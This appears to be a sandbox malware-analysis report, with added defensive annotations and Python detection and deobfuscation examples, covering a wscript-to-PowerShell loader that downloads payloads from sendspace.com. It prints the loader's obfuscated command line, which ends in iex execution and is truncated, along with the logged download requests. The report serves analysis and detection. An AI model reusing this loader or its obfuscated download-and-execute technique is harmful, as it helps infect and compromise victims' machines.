Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware (this URL is the IconUri in the manifest of the Pester module that ships with Windows PowerShell, so the reputation hit is on a platform string read from powershell.exe memory, not on infrastructure belonging to the sample)
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: unknown | HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 69.31.136.53:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: powershell.exe, 00000004.00000002.2323976689.0000000008840000.00000004.00000020.00020000.00000000.sdmp | Binary string: \??\C:\Windows\System.Management.Automation.pdb
Source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp | Binary string: ment.Automation.pdb
Source: powershell.exe, 00000004.00000002.2324570247.00000000088C6000.00000004.00000020.00020000.00000000.sdmp | Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb
Source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5
Source: powershell.exe, 00000004.00000002.2320193055.0000000007728000.00000004.00000020.00020000.00000000.sdmp | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbR
Source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp | Binary string: System.Core.pdb
Source: powershell.exe, 00000004.00000002.2320193055.0000000007728000.00000004.00000020.00020000.00000000.sdmp | Binary string: CallSite.Targetore.pdb
Source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp | Binary string: System.Core.pdbk
(These PDB paths belong to System.Management.Automation and System.Core, the .NET assemblies every Windows PowerShell process loads; the stray trailing characters and the merged fragment CallSite.Targetore.pdb are artefacts of extracting strings from process memory. None of them says anything about the sample itself.)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox View | IP Address: 69.31.136.57
Source: Joe Sandbox View | IP Address: 69.31.136.53
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /pro/dl/exw2o1 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: www.sendspace.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtp HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: fs13n4.sendspace.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /pro/dl/dvbcvt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: www.sendspace.com
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dlpro/abb1ac42d6f7e317093ecbc9d7acfd44/664f6ddc/dvbcvt/TGFVxUhEOgecNvM13.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Cache-Control: no-cache
    Host: fs12n1.sendspace.com
    Connection: Keep-Alive
    Cookie: SID=kasl9f49sokivj0jd0u0img0e2
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported three times; 1.1.1.1 is Cloudflare's public DNS resolver, so this is the resolver traffic itself rather than a separate contact by the sample)
Source: global traffic | DNS traffic detected: DNS query: www.sendspace.com
Source: global traffic | DNS traffic detected: DNS query: fs13n4.sendspace.com
Source: global traffic | DNS traffic detected: DNS query: fs12n1.sendspace.com
Source: powershell.exe, 00000001.00000002.2531372219.0000015C30440000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fs13n4.sendspace.com
Source: powershell.exe, 00000001.00000002.2672896517.0000015C3E291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E221000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2531372219.0000015C30409000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sendspace.com
Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E221000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2531372219.0000015C3042D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs13n4.sendspaX
Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E75E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C3042D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs13n4.sendspace.com
Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E75A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C30429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C2E75E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C3042D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C30409000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs13n4.sendspace.com/dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtp
Source: powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2531372219.0000015C2EDAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.2697536992.0000015C468F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.c
Source: powershell.exe, 00000001.00000002.2672896517.0000015C3E291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E447000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C30250000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.sendspace.com
Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E447000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.sendspace.com/pro/dl/exw2o1P
Source: powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.sendspace.com/pro/dl/exw2o1XR
(Of these, only the sendspace.com URLs belong to the sample. The nuget.org, contoso.com, Pester, apache.org, schemas.xmlsoap.org, aka.ms and go.microsoft.com strings are resources of Windows PowerShell, .NET and the modules bundled with them, and appear in the memory of any powershell.exe. Entries such as sendspaX, exw2o1P and exw2o1XR are partial or overrun reads of the same strings.)
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: amsi64_2656.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution (Author: ditekSHen)
Source: amsi32_6536.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution (Author: ditekSHen)
Source: Process Memory Space: powershell.exe PID: 2656, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution (Author: ditekSHen)
Source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution (Author: ditekSHen)
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 6908
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 6908
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
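The launch chain recorded above (wscript.exe starting powershell.exe with a 6908-byte command line that assembles its strings from fragments) is the part of this report that converts directly into a detection. The Python below is an added example written for this page, not part of the sandbox output or of any vendor rule set: it scores constructed process-creation events, shaped like Sysmon Event ID 1 / Windows 4688 fields, against three signals taken from the report. The 4096-byte command-line threshold and the two-signal alerting rule are assumptions chosen for the example, not values from the page.

```python
import re

# Constructed events in the shape of Sysmon Event ID 1 / Windows 4688 fields.
# The first mirrors the chain in the report (wscript.exe spawning powershell.exe
# with an oversized command line built from string fragments); the other two
# are benign controls. None of them is copied from the sandbox output.
EVENTS = [
    {
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": (
            '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
            "\"$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';"
            "$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){"
            "$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}"
            + "X" * 6700 + '"'   # padding stands in for the rest of the 6908-byte line
        ),
    },
    {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoProfile -Command Get-Service -Name Spooler",
    },
    {
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c echo logon script done",
    },
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Assumed threshold: interactive command lines are rarely above a few hundred
# bytes; the one in the report is 6908.
MAX_SANE_CMDLINE = 4096
# String-building obfuscation seen in the report: literals appended with +=
# and a method name resolved through a variable (`.$var.Invoke(`).
FRAGMENT_APPEND = re.compile(r"\$\w+\+='[^']*'")
DYNAMIC_METHOD = re.compile(r"\.\$\w+\.Invoke\(")


def basename(path: str) -> str:
    """Last path component, lower-cased, so image paths compare by file name."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(event: dict) -> list:
    """Return the reasons an event resembles the report's launch chain."""
    reasons = []
    parent = basename(event["ParentImage"])
    child = basename(event["Image"])
    cmd = event["CommandLine"]
    if parent in SCRIPT_HOSTS and child == "powershell.exe":
        reasons.append(f"{parent} spawned powershell.exe")
    if len(cmd) > MAX_SANE_CMDLINE:
        reasons.append(f"command line of {len(cmd)} bytes")
    if len(FRAGMENT_APPEND.findall(cmd)) >= 2 and DYNAMIC_METHOD.search(cmd):
        reasons.append("string fragments appended, then invoked via a variable-named method")
    return reasons


def suspicious(event: dict) -> bool:
    """Alert only when at least two independent signals fire (assumed policy)."""
    return len(triage(event)) >= 2


if __name__ == "__main__":
    for event in EVENTS:
        print(basename(event["ParentImage"]), "->", basename(event["Image"]), triage(event))
```

Requiring two signals keeps a long but legitimate command line, or an admin logon script that calls PowerShell, from paging anyone on its own; the first event trips all three.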
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. 
fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuld |
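The command line above builds the word Substring from three fragments and then routes every string through Lnkampene, which keeps one character out of every six in a junk-padded literal (loop from index 5, step 6, stopping before the last character) and hands the results to iex through Kolesterol. The Python below is an added example written for this page, not code from the sample or from Joe Sandbox: it ports that decoder, folds the fragment concatenation, and pulls the URLs out of a constructed script fragment assembled from four literals copied from the report ($Organismers, $Skadevolderne, $Malaxate, $Maimedly). Two caveats: the decoder is positional, and this rendering of the report appears to have collapsed runs of spaces inside the longer literals (the User-Agent string among them), so those do not decode cleanly from the page as shown; take the command line from the raw sandbox report or from a process-creation log before decoding. And the regular expressions assume the single-quoted literal style this script uses, so a sample that switches to double quotes or here-strings needs them adjusted.

```python
import re

# Constructed test input: four obfuscated literals copied from the wscript.exe ->
# powershell.exe command line in the report, plus the script's own three-part
# build of the word "Substring". Only literals without runs of spaces are used,
# because this copy of the report collapses consecutive spaces and the decoder
# below is purely positional.
ORGANISMERS = "LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri "
SKADEVOLDERNE = (
    "VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,w"
    "MinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten c"
    "Legate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/"
    "Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg "
)
MALAXATE = "D.bri>Fiske "
MAIMEDLY = "mudpuiPadeye.rescx Te.t "

SCRIPT = ";".join([
    "$Massesamfund='Su'",
    "$Massesamfund+='bstrin'",
    "$Massesamfund+='g'",
    f"$Organismers=Lnkampene '{ORGANISMERS}'",
    f"$Skadevolderne=Lnkampene '{SKADEVOLDERNE}'",
    f"$Malaxate=Lnkampene '{MALAXATE}'",
    f"$Maimedly=Lnkampene '{MAIMEDLY}'",
])


def lnkampene(blob: str, start: int = 5, step: int = 6) -> str:
    """Port of the script's Lnkampene function.

    The PowerShell loop is `For($i=5; $i -lt $len-1; $i+=6) { Substring($i,1) }`:
    every sixth character, starting at index 5 and stopping before the last
    character, is real; the five characters in front of each one are filler.
    """
    return blob[start:len(blob) - 1:step]


# `Lnkampene '<literal>'`; PowerShell escapes a quote inside '...' as ''.
LNK_CALL = re.compile(r"Lnkampene\s+'((?:[^']|'')*)'")
# `$name='lit'` and `$name+='lit'`, the concatenation layer used for "Substring".
ASSIGN = re.compile(r"\$(\w+)\s*(\+?=)\s*'((?:[^']|'')*)'")
URL = re.compile(r"https?://[^\s'\";]+")


def deobfuscate(script: str) -> str:
    """Replace every Lnkampene call with the literal it decodes to."""
    def decode(match):
        literal = match.group(1).replace("''", "'")
        return "'" + lnkampene(literal).replace("'", "''") + "'"
    return LNK_CALL.sub(decode, script)


def resolve_literals(script: str) -> dict:
    """Fold `$v='a';$v+='b'` string building into the final value of each variable."""
    values = {}
    for name, op, literal in ASSIGN.findall(script):
        literal = literal.replace("''", "'")
        values[name] = values.get(name, "") + literal if op == "+=" else literal
    return values


def extract_urls(script: str) -> list:
    """URLs present in the decoded script, in order of first appearance."""
    seen = []
    for url in URL.findall(script):
        if url not in seen:
            seen.append(url)
    return seen


if __name__ == "__main__":
    plain = deobfuscate(SCRIPT)
    for name, value in resolve_literals(plain).items():
        print(f"${name} = {value!r}")
    print("download URLs:", extract_urls(plain))
```

Running it recovers User-Agent, the sendspace.com download URL that matches the HTTP requests logged above, the redirect operator, and iex, which is the variable the script later calls through Kolesterol to execute what it has built.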